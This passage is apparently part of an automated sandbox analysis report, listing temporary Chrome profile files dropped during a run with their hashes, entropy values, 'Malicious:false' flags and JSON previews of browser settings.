                                                                                                                                                                Preview: ................T...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e.\.2.1...0.8.3...0.4.2.5...0.0.0.3.\.a.m.d.6.4.\.F.i.l.e.S.y.n.c.S.h.e.l.l.6.4...d.l.l.......puA...c.:.\.p.r.o.g.r.a.m. .f.i.l.e.s. .(.x.8.6.).\.m.i.c.r.o.s.o.f.t. .o.n.e.d.r.i.v.e.\.2.1...0.8.3...0.4.2.5...0.0.0.3.\.a.m.d.6.4.\.......f.i.l.e.s.y.n.c.s.h.e.l.l.6.4...d.l.l.......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e."...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n.....2.1...0.8.3...0.4.2.5...0.0.0.3.....T...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e.\.2.1...0.8.3...0.4.2.5...0.0.0.3.\.a.m.d.6.4.\.F.i.l.e.S.y.n.c.S.h.e.l.l.6.4...d.l.l.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....B8. ...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.7.-.Z.i.p.\.7.-.z.i.p...d.l.l.......n\....%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.7.-.z.i.p.\.......7.-.z.i.p...d.l.l.......7.-.Z.i.p.......7.-.Z.i.p. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n.......1.9...0.0................B8.....
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\90c64af1-dba9-41ff-9e26-e2fa720d06fa.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):73441
                                                                                                                                                                Entropy (8bit):6.044226426231925
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:5Fpu/IsNFIx1ZILCW93va9hCsjUtjOjXMWQ:PQIsXIx1ZIz9S/RgyjXE
                                                                                                                                                                MD5:C09599A339E7331EC0BFC4456A00E962
                                                                                                                                                                SHA1:F90D36D1388D36BBD55394B17E53C3DBEA37BAA8
                                                                                                                                                                SHA-256:6753414437640696F13D891ABE123C06C676A341B1B5E37643B1D5E1BBF985BA
                                                                                                                                                                SHA-512:97AB8FCFE365D9726A4B3047D54060C5B41273BE3897081156CC0B4D38AC0C3B68AB81FDA7284A3A9DA49F6F42927A9D14BED27F5C05F040D21E71A8E99DDDB2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"91.0.4472.77"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.629166233160556e+12,"network":1.629133834e+12,"ticks":7317648369.0,"uncertainty":3792367.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABBQ7WxpM2gT7fMNkY5iRxkAAAAAAIAAAAAABBmAAAAAQAAIAAAALDWDwoLRYqp0NkiPsTxUN2QcOPsitaJrdacpo+ULE2PAAAAAA6AAAAAAgAAIAAAAOIeKQBWbQSCqXv1OSNS2lIZGHfAdJRwvbkapN4/FWvwMAAAAPz8I/w07KQb4Ut8ObsBGVgFwbuU88R362cCGZpNEtOEILJDMaKWOA4Y9ejBRTt5kEAAAADq8RkIezfgqGPgEaEMkhoGd9qhyBeyucXcRUPEI7mgYIxaDt8C5FJrjkEhV5EOUcUmR2SCzqYelImLnfOlbhRQ"},"policy":{"last_statistics_update":"13273639829889703"},"profile":{"info_cache":{"Default":{"active_time":1629166230.631308,"avatar_icon":"chro
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\9f4242d4-fee4-4107-b2c8-e569c79fe597.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):103220
                                                                                                                                                                Entropy (8bit):3.7617699118143513
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:whnDwMoWkNJRVYnvX9ip/y6pJe3u0hE5QASmNColkGSfHR9AjV2CWKwFyxXPvklY:QYG8EGL/Elve2ahxKeyVTm
                                                                                                                                                                MD5:EEEC6F847466324F8C09F44A6EAFF319
                                                                                                                                                                SHA1:643D2BBA0448068785F58988968D5C4F5C9B76CD
                                                                                                                                                                SHA-256:2A1D20317DDA0D20C7FDA014AAE308F409EDC8E0CFF1DC6B2DE1DFB209EB4AB7
                                                                                                                                                                SHA-512:324CA95F02454A3692F6EA3454822B97CE260C0B56C6E9A1077DAA8DF7ACD90EFC3BEBB42E5DEF5350BD19F62B4421792CB77D3E4B65DF9A2C49ECEB45014852
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 0...............T...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e.\.2.1...0.8.3...0.4.2.5...0.0.0.3.\.a.m.d.6.4.\.F.i.l.e.S.y.n.c.S.h.e.l.l.6.4...d.l.l.......puA...c.:.\.p.r.o.g.r.a.m. .f.i.l.e.s. .(.x.8.6.).\.m.i.c.r.o.s.o.f.t. .o.n.e.d.r.i.v.e.\.2.1...0.8.3...0.4.2.5...0.0.0.3.\.a.m.d.6.4.\.......f.i.l.e.s.y.n.c.s.h.e.l.l.6.4...d.l.l.......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e."...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n.....2.1...0.8.3...0.4.2.5...0.0.0.3.....T...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e.\.2.1...0.8.3...0.4.2.5...0.0.0.3.\.a.m.d.6.4.\.F.i.l.e.S.y.n.c.S.h.e.l.l.6.4...d.l.l.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....B8. ...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.7.-.Z.i.p.\.7.-.z.i.p...d.l.l.......n\....%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.7.-.z.i.p.\.......7.-.z.i.p...d.l.l.......7.-.Z.i.p.......7.-.Z.i.p. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n.......1.9...0.0................B8.....
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40
                                                                                                                                                                Entropy (8bit):3.254162526001658
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:FkXSoWA0:+g
                                                                                                                                                                MD5:FA7200D6F80CD1757911C45559E59C0E
                                                                                                                                                                SHA1:89C6E99BAEC4EBB3E9A97B928FB473D1498EBA88
                                                                                                                                                                SHA-256:D9779EA4D6DD544A23C2A1C53146B6A4E596927F47DFA0680B0A7EE751D43BB2
                                                                                                                                                                SHA-512:71D9B2DA8EAF404063D918812BA61C3EFB6A23A283B0332180A38C8137FBB21D7977C008D5A57A74469776945CD4ED42C0BCC09F923EDEC52D8F7FE90FA2D104
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: sdPC.....................A.>'..M..,.,.-.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\1ed19a1e-8aa6-491c-b098-b8a59a0c270d.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):21102
                                                                                                                                                                Entropy (8bit):5.533022210199644
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:OiztQLl7XQ1kXqKf/pUZNCgVLH2HfEarULdHGGnHfn/m4i:GLljQ1kXqKf/pUZNCgVLH2HftrULBGGU
                                                                                                                                                                MD5:CD448B36767EC023BF56DCE73376DD16
                                                                                                                                                                SHA1:0950071C9DE6436367092331F145B2BB707877D0
                                                                                                                                                                SHA-256:3CEE50ACE3665FA5BECCE1C891574F7F4E71F95B15A12251CB308F6ACE1D9A85
                                                                                                                                                                SHA-512:CAE08E011274ED298F377BB8CA117158EF2422EA646C471551C0587404A67AFC756C4385A10C64A8C6A99B47C1A6CFEA624E47EAA2089B81F28AE19A0E60049D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13273639830106535","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\2c514167-5195-4c1a-9430-f387fa86afff.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4108
                                                                                                                                                                Entropy (8bit):5.003468715706129
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcBcvlprAGqKlQKHoTw0pB/Ew8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGLrVrqooH:n8AdKIN1aRWMoiVmde+VrMVXAiZw4
                                                                                                                                                                MD5:6D57FD7E267111896845AC671FEE4BF9
                                                                                                                                                                SHA1:D068BE0C659E9E6D99A6D72E64F1CDA7FD0DD933
                                                                                                                                                                SHA-256:E8D3C8084404E89F437F276D64104A5ED6D3E7E806FACE55CF9137A07BEF7E1B
                                                                                                                                                                SHA-512:93389C0411CBDD1A4839E41DEC29DA9CDFDF103E1DAFACED12B3DA7B1914A47F7145DDBA29997144B1AD14F7D912CA7074827019CB4EC18A1AC0049FF68900B6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autocomplete":{"retention_policy_last_version":92},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693,"this_week_services_downstream_foreground_kb":{"115188287":27,"125522256":1,"21145003":1051,"35565745":1,"5151071":1}},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"download":{"directory_upgrade":true},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"last_chrome_version":"92.0.4515.107"},"gaia_cookie":{"changed_time":1629166234.486642,"hash":"2jmj7l5rSw0yVb/vlWAYkK/YBwk=","last_list_accounts_data":"[\"gaia.l.a.r\",[]]"},"gcm":{"product_category_for_
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\2e76c646-8c90-4fc4-b51b-b070e44dcfda.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3488
                                                                                                                                                                Entropy (8bit):4.950763973648408
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcsvlSrAN4qwoTw0pB/nw8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGgrtqoonVuAip:n50nNmaRWMoiVmdeVtMVuAip
                                                                                                                                                                MD5:9C92AB8E1E9E924BD362FFBAD4C4B312
                                                                                                                                                                SHA1:F860816E33FA0B1ADCFBFADCED9D493721C41FC8
                                                                                                                                                                SHA-256:5C79045F01894515A73F7842ADC44028C12F5956D85F00375E99BDDB9103394E
                                                                                                                                                                SHA-512:2BFBA06032032232BFA80F316489E917A3F77CF95FD16755CF7B08D586F03026EA78F83B23C49EC024E50581BB5604F1AF474F21F57637AA0C08347F97AF0042
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"last_chrome_version":"92.0.4515.107"},"gcm":{"product_category_for_subtypes":"com.chrome.windows"},"google":{"services":{"signin_scoped_device_id":"b94e6f13-7987-48dc-98f4-d60c75c3dbd7"}},"intl":{"selected_languages":"en-US,en"},"invalidation":{"per_sender_topics_to_handler":{"1013309121859":{},"8181035976":{}}},"media":{"device_id_salt":"099511625CE63697AD937561012FD491","engagement":{"schema_version":4}},
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\2f1d5792-f723-483e-999e-d1d70833604b.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):708
                                                                                                                                                                Entropy (8bit):5.564956104815177
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:YI9Mkq/HH+UAnIOVRWcNnYj+UAnIblTZCPXR7N+UAnI7PHt0FKO+UAnInQ:YIakq/HeU4nWaUxSh7wUhtVRUJQ
                                                                                                                                                                MD5:59E7A95B3EE22ADFEF4A42969734CE7B
                                                                                                                                                                SHA1:06A91D42BC129BD3E4273E7FCF43563FC15A1C3A
                                                                                                                                                                SHA-256:3A8F1C81B97F32A06FBD7B3A2200B2FC1DE77EA39CAC6E1AC3FBAF48045822E9
                                                                                                                                                                SHA-512:3BC57E33A4F26FCE59BDBEEE4E12704767AF6EC5366416B947D8CC42F627D708FA194DCB2BD9D2A2E2CDF72E35E29F9677E62ADDBD825985C0BEB280DD61E9CA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"expect_ct":[],"sts":[{"expiry":1654701301.094781,"host":"0J7rAWV0ouCFYJ9XrkDiKnAO1SshXJmLJE1SS3V8kDM=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1623165301.094784},{"expiry":1654701298.912333,"host":"5EdUoB7YUY9zZV+2DkgVXgho8WUvp+D+6KpeUOhNQIM=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1623165298.912336},{"expiry":1660702234.469224,"host":"8/RrMmQlCD2Gsp14wUCE1P8r7B2C5+yE0+g79IPyRsc=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1629166234.469228},{"expiry":1654701300.827908,"host":"+ccWXqaoHJ9hfuXbleKV6FQUrBlyXAJ31BdqjNQJpHs=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1623165300.827911}],"version":2}
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\41699dff-8814-425c-a6ea-2da77db4549c.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4794
                                                                                                                                                                Entropy (8bit):5.24749425498766
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:nvAdIllnHa8KIN1aRWMoiVmdexVrMVXAiZw4:nodWHa8MWMBVq
                                                                                                                                                                MD5:E20011D796B928DF928BD3C7188DCB63
                                                                                                                                                                SHA1:39056EACA6FAF710C7D003EFF9194DCA6FAC1CE9
                                                                                                                                                                SHA-256:F676A94A4FB5231B8FE53D570DE9BB09F6F1C49E96EC271F731B085E3F74E95B
                                                                                                                                                                SHA-512:E8A124AE0243B1969A976D14B90D33F87B83A18111A3E8655435D57AC9AB18D1EF97483AE950258C8E8FC64ED39D804F5A3CC2DA659BF13D26462E926AEF52D8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autocomplete":{"retention_policy_last_version":92},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693,"this_week_services_downstream_foreground_kb":{"115188287":27,"125522256":1,"21145003":1051,"35565745":1,"49601082":1,"50464499":1,"5151071":1,"54845618":5}},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"download":{"directory_upgrade":true},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"install_signature":{"expire_date":"2021-11-08","ids":["pkedcjkdefgpdelpbcmbmeomcjbeemfm"],"invalid_ids":[],"salt":"P/VqSXKpUCSngasss21FVFHriEg3LI9c8GPtJCELXkM=","s
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\4469433b-5b42-45c3-bdb2-5ead1408960e.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3343
                                                                                                                                                                Entropy (8bit):4.945222848960228
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YXsVVMHzzsmdAMHtKsyfDszmcQ/RLsOcXSsM1PzshVMH8sp1AAMHDysKGMHTFsB5:PGqGctrmKwGPTGD7GSGMphH
                                                                                                                                                                MD5:CAB8BEABE7E66A4015C98A3C77B3698B
                                                                                                                                                                SHA1:C960AAAEA7014E105290C7D0F09BFCA837C8E8CC
                                                                                                                                                                SHA-256:75431010BFE77818B8BEF4B0C4B328C00668DC6B13C09AAB769EBF58BDA4EDF7
                                                                                                                                                                SHA-512:0D1E94E84294AEA4BF400FF9D0654748BFFEB92D3A1643A6A13B541ADB1BC13EA2F649560A27C8CC3D8AEF9DA5D6B668C7E3BE696091CE882A475B91A9A4CAC8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13270230891381309","port":443,"protocol_str":"quic"},{"advertised_alpns":["h3-Q050"],"expiration":"13270230891381310","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":39697},"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13270230887958662","port":443,"protocol_str":"quic"},{"advertised_alpns":["h3-Q050"],"expiration":"13270230887958664","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":52163},"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13270230886326794","port":443,"protocol_str":"quic"},{"advertised_alpns":["h3-Q050"],"expiration":"13270230886326795","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://clients2.google.com","supports_spdy
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\5b5c9702-994a-420f-a2dc-e3664907a7df.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15868
                                                                                                                                                                Entropy (8bit):5.5774051809815495
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:OiztQLl7XQ1kXqKf/pUZNCgVLH2HfEarUQntm41:GLljQ1kXqKf/pUZNCgVLH2HftrUuma
                                                                                                                                                                MD5:8C7279D30F5DAB19786F5ED17AC4ED52
                                                                                                                                                                SHA1:BF90C07B18CA341FA16350863F6A60F5E953BBEE
                                                                                                                                                                SHA-256:616BD067902D64231003147629857659F6DC9B45242C48416411EB9AFE3C7EDB
                                                                                                                                                                SHA-512:03F9EFD638C63A6057A3460AF8E0301D17A1868973AE8C39EC3E13AE49899C1275A322484778239B3282470752F1AA5A502EEFBFBAB02541E8DD15CB775D8A2B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13273639830106535","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\5f553002-c2c9-4f2c-b30a-1bd497a54999.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15867
                                                                                                                                                                Entropy (8bit):5.5776230054412395
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:Oizt7Ll7XQ1kXqKf/pUZNCgVLH2HfEarUmntm4xN:hLljQ1kXqKf/pUZNCgVLH2HftrUYmQ
                                                                                                                                                                MD5:E434275EF952AB8A5EC2556162E19245
                                                                                                                                                                SHA1:83714B340A27533B80ADF2D9CA8B650C3CE3686C
                                                                                                                                                                SHA-256:735D2AF58FE5713F4B99620311EA47F17576BD748696D3F748F4EE527AF9378B
                                                                                                                                                                SHA-512:7FF1A650C7816CEC90E77B89DF3F9E4D20A7FB748A84F49E64518B70644D6984B8A166270343719BE402177F2D5A0F9B94B693B6AAEECDD6C04F05521ADA1A29
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13273639830106535","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\723aa1b0-616b-4450-9cb0-19f961bda179.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1
                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\7780ba6a-e8df-41c8-b60c-41967110ae39.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4198
                                                                                                                                                                Entropy (8bit):5.014393042635659
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcBcvlVvErAGqKlQKHoTw0pB/Ew8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGqrVrqH:nzAdKIN1aRWMoiVmdexVrMVXAiZw4
                                                                                                                                                                MD5:C8BA2271CEAEEC958D05A61C0FA6A46B
                                                                                                                                                                SHA1:408388C34517EBF2D5CE3CDEB054C23371FF5B07
                                                                                                                                                                SHA-256:73DE4038741F2EBE8491226278D905927D497ED6AAF652EBDD7BF0DF1995EC2B
                                                                                                                                                                SHA-512:B9F9D278CCBFC20B4C25EBA5526E44DB3F5489E6D12995FC1F8EF497F51426B9C283F3C4E8F1622EB66C03D73E2B89D4789F66416BC25F9F5D13923645E3EC9D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autocomplete":{"retention_policy_last_version":92},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693,"this_week_services_downstream_foreground_kb":{"115188287":27,"125522256":1,"21145003":1051,"35565745":1,"49601082":1,"5151071":1,"54845618":5}},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"download":{"directory_upgrade":true},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"last_chrome_version":"92.0.4515.107"},"gaia_cookie":{"changed_time":1629166234.486642,"hash":"2jmj7l5rSw0yVb/vlWAYkK/YBwk=","last_list_accounts_data":"[\"gaia.l.a.r\",[]]"},"gc
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\9e077c77-197d-4e12-abca-1cbe35258060.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4108
                                                                                                                                                                Entropy (8bit):5.003468715706129
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcBcvlprAGqKlQKHoTw0pB/Ew8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGLrVrqooH:n8AdKIN1aRWMoiVmde+VrMVXAiZw4
                                                                                                                                                                MD5:6D57FD7E267111896845AC671FEE4BF9
                                                                                                                                                                SHA1:D068BE0C659E9E6D99A6D72E64F1CDA7FD0DD933
